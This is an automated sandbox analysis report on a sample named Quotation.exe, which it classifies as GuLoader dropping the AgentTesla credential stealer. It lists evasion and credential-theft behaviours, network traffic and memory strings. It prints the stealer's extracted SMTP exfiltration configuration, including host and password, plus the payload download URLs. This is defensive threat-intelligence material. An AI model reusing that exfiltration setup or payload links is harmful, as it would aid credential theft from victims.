Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Quotation.exe

Overview

General Information

Sample name:Quotation.exe
Analysis ID:1545944
MD5:5607e8b6d0197e51ec19233e72bc2036
SHA1:91cf6d8f6eeb59e44741d16c4a1ba38cffe59435
SHA256:2013e4b243a72b09add6488f84ad97b47ce0587cdecc1114f4380c82650e069c
Tags:exeuser-lowmal3
Infos:

Detection

AgentTesla, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Yara detected GuLoader
AI detected suspicious sample
Initial sample is a PE file and has a suspicious name
Installs a global keyboard hook
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Outbound SMTP Connections
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • Quotation.exe (PID: 6964 cmdline: "C:\Users\user\Desktop\Quotation.exe" MD5: 5607E8B6D0197E51EC19233E72BC2036)
    • Quotation.exe (PID: 1212 cmdline: "C:\Users\user\Desktop\Quotation.exe" MD5: 5607E8B6D0197E51EC19233E72BC2036)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.showpiece.trillennium.biz", "Username": "build@showpiece.trillennium.biz", "Password": "3KJ[T.3]fsSW"}
SourceRuleDescriptionAuthorStrings
00000005.00000002.2623639299.0000000036293000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000005.00000002.2623639299.000000003628B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000005.00000002.2623639299.0000000036261000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000005.00000002.2623639299.0000000036261000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000000.00000002.1962376405.00000000059AE000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
            Click to see the 2 entries

            System Summary

            barindex
            Source: Network ConnectionAuthor: frack113: Data: DesusertionIp: 67.23.226.139, DesusertionIsIpv6: false, DesusertionPort: 587, EventID: 3, Image: C:\Users\user\Desktop\Quotation.exe, Initiated: true, ProcessId: 1212, Protocol: tcp, SourceIp: 192.168.2.9, SourceIsIpv6: false, SourcePort: 49976
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-31T10:45:20.670689+010028032702Potentially Bad Traffic192.168.2.949973142.250.185.238443TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: Quotation.exe.6964.0.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.showpiece.trillennium.biz", "Username": "build@showpiece.trillennium.biz", "Password": "3KJ[T.3]fsSW"}
            Source: Quotation.exeReversingLabs: Detection: 42%
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: Quotation.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 142.250.185.238:443 -> 192.168.2.9:49973 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.217.16.129:443 -> 192.168.2.9:49974 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.9:49975 version: TLS 1.2
            Source: Quotation.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_004066F7 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_004066F7
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_004065AD FindFirstFileW,FindClose,0_2_004065AD
            Source: global trafficTCP traffic: 192.168.2.9:49976 -> 67.23.226.139:587
            Source: Joe Sandbox ViewIP Address: 67.23.226.139 67.23.226.139
            Source: Joe Sandbox ViewIP Address: 172.67.74.152 172.67.74.152
            Source: Joe Sandbox ViewIP Address: 172.67.74.152 172.67.74.152
            Source: Joe Sandbox ViewASN Name: DIMENOCUS DIMENOCUS
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownDNS query: name: api.ipify.org
            Source: unknownDNS query: name: api.ipify.org
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49973 -> 142.250.185.238:443
            Source: global trafficTCP traffic: 192.168.2.9:49976 -> 67.23.226.139:587
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1Of5kNy0BP9ETJWGaeMWfLrbVk-DyWIxf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1Of5kNy0BP9ETJWGaeMWfLrbVk-DyWIxf&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1Of5kNy0BP9ETJWGaeMWfLrbVk-DyWIxf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1Of5kNy0BP9ETJWGaeMWfLrbVk-DyWIxf&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: drive.google.com
            Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
            Source: global trafficDNS traffic detected: DNS query: api.ipify.org
            Source: global trafficDNS traffic detected: DNS query: mail.showpiece.trillennium.biz
            Source: Quotation.exe, 00000005.00000002.2623639299.000000003628B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.showpiece.trillennium.biz
            Source: Quotation.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error...
            Source: Quotation.exe, 00000005.00000002.2623639299.0000000036293000.00000004.00000800.00020000.00000000.sdmp, Quotation.exe, 00000005.00000002.2601745635.0000000005C81000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000005.00000002.2601745635.0000000005D08000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000005.00000002.2624796342.0000000038ACE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r11.i.lencr.org/0
            Source: Quotation.exe, 00000005.00000002.2623639299.0000000036293000.00000004.00000800.00020000.00000000.sdmp, Quotation.exe, 00000005.00000002.2601745635.0000000005C81000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000005.00000002.2601745635.0000000005D08000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000005.00000002.2624796342.0000000038ACE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r11.o.lencr.org0#
            Source: Quotation.exe, 00000005.00000002.2623639299.0000000036211000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: Quotation.exe, 00000005.00000002.2623639299.000000003628B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://showpiece.trillennium.biz
            Source: Quotation.exe, 00000005.00000002.2623639299.0000000036293000.00000004.00000800.00020000.00000000.sdmp, Quotation.exe, 00000005.00000002.2601745635.0000000005C81000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000005.00000002.2624796342.0000000038ACE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
            Source: Quotation.exe, 00000005.00000002.2624894201.0000000038B5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencrT
            Source: Quotation.exe, 00000005.00000002.2623639299.0000000036293000.00000004.00000800.00020000.00000000.sdmp, Quotation.exe, 00000005.00000002.2601745635.0000000005C81000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000005.00000002.2624894201.0000000038B5E000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000005.00000002.2624796342.0000000038ACE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
            Source: Quotation.exe, 00000005.00000002.2623639299.0000000036211000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
            Source: Quotation.exe, 00000005.00000002.2623639299.0000000036211000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
            Source: Quotation.exe, 00000005.00000002.2623639299.0000000036211000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
            Source: Quotation.exe, 00000005.00000003.2085619981.0000000005C86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
            Source: Quotation.exe, 00000005.00000002.2601745635.0000000005C18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
            Source: Quotation.exe, 00000005.00000002.2601745635.0000000005C55000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000005.00000002.2623121936.0000000035460000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1Of5kNy0BP9ETJWGaeMWfLrbVk-DyWIxf
            Source: Quotation.exe, 00000005.00000002.2601745635.0000000005C55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1Of5kNy0BP9ETJWGaeMWfLrbVk-DyWIxfQf
            Source: Quotation.exe, 00000005.00000002.2601745635.0000000005C81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/(
            Source: Quotation.exe, 00000005.00000002.2601745635.0000000005C81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/5
            Source: Quotation.exe, 00000005.00000003.2085619981.0000000005C86000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000005.00000002.2601745635.0000000005C18000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000005.00000003.2085733304.0000000005CC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1Of5kNy0BP9ETJWGaeMWfLrbVk-DyWIxf&export=download
            Source: Quotation.exe, 00000005.00000002.2601745635.0000000005C71000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000005.00000003.2085619981.0000000005C86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
            Source: Quotation.exe, 00000005.00000002.2601745635.0000000005C71000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000005.00000003.2085619981.0000000005C86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
            Source: Quotation.exe, 00000005.00000002.2601745635.0000000005C71000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000005.00000003.2085619981.0000000005C86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: Quotation.exe, 00000005.00000002.2601745635.0000000005C71000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000005.00000003.2085619981.0000000005C86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
            Source: Quotation.exe, 00000005.00000002.2601745635.0000000005C71000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000005.00000003.2085619981.0000000005C86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
            Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
            Source: unknownHTTPS traffic detected: 142.250.185.238:443 -> 192.168.2.9:49973 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.217.16.129:443 -> 192.168.2.9:49974 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.9:49975 version: TLS 1.2

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            barindex
            Source: C:\Users\user\Desktop\Quotation.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\Quotation.exeJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

            System Summary

            barindex
            Source: initial sampleStatic PE information: Filename: Quotation.exe
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_004036DA EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,0_2_004036DA
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_700223510_2_70022351
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 5_2_000DE2895_2_000DE289
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 5_2_000DA5005_2_000DA500
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 5_2_000DA9605_2_000DA960
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 5_2_000D4A985_2_000D4A98
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 5_2_000DDCA85_2_000DDCA8
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 5_2_000D3E805_2_000D3E80
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 5_2_000D41C85_2_000D41C8
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 5_2_392B31085_2_392B3108
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 5_2_392BC2205_2_392BC220
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 5_2_392B7E205_2_392B7E20
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 5_2_392B56485_2_392B5648
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 5_2_392BB2BA5_2_392BB2BA
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 5_2_392B66985_2_392B6698
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 5_2_392B5D835_2_392B5D83
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 5_2_392BE4405_2_392BE440
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 5_2_392B00405_2_392B0040
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 5_2_392B23385_2_392B2338
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 5_2_392B77405_2_392B7740
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 5_2_3979894C5_2_3979894C
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 5_2_397919885_2_39791988
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 5_2_397919825_2_39791982
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 5_2_398F4B485_2_398F4B48
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 5_2_398F04485_2_398F0448
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 5_2_000DB3B45_2_000DB3B4
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 5_2_392B00125_2_392B0012
            Source: Quotation.exeStatic PE information: invalid certificate
            Source: Quotation.exe, 00000005.00000002.2623532623.00000000360F9000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs Quotation.exe
            Source: Quotation.exe, 00000005.00000002.2601745635.0000000005C55000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Quotation.exe
            Source: Quotation.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/12@4/4
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_004036DA EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,0_2_004036DA
            Source: C:\Users\user\Desktop\Quotation.exeFile created: C:\Users\user\overlaysJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeMutant created: NULL
            Source: C:\Users\user\Desktop\Quotation.exeFile created: C:\Users\user\AppData\Local\Temp\nsg548E.tmpJump to behavior
            Source: Quotation.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Quotation.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Users\user\Desktop\Quotation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\Quotation.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: Quotation.exeReversingLabs: Detection: 42%
            Source: C:\Users\user\Desktop\Quotation.exeFile read: C:\Users\user\Desktop\Quotation.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\Quotation.exe "C:\Users\user\Desktop\Quotation.exe"
            Source: C:\Users\user\Desktop\Quotation.exeProcess created: C:\Users\user\Desktop\Quotation.exe "C:\Users\user\Desktop\Quotation.exe"
            Source: C:\Users\user\Desktop\Quotation.exeProcess created: C:\Users\user\Desktop\Quotation.exe "C:\Users\user\Desktop\Quotation.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: oleacc.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeFile written: C:\Users\user\Music\antithetic.iniJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
            Source: Quotation.exeStatic file information: File size 1197176 > 1048576
            Source: Quotation.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            barindex
            Source: Yara matchFile source: 00000000.00000002.1962376405.00000000059AE000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_70022351 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_70022351
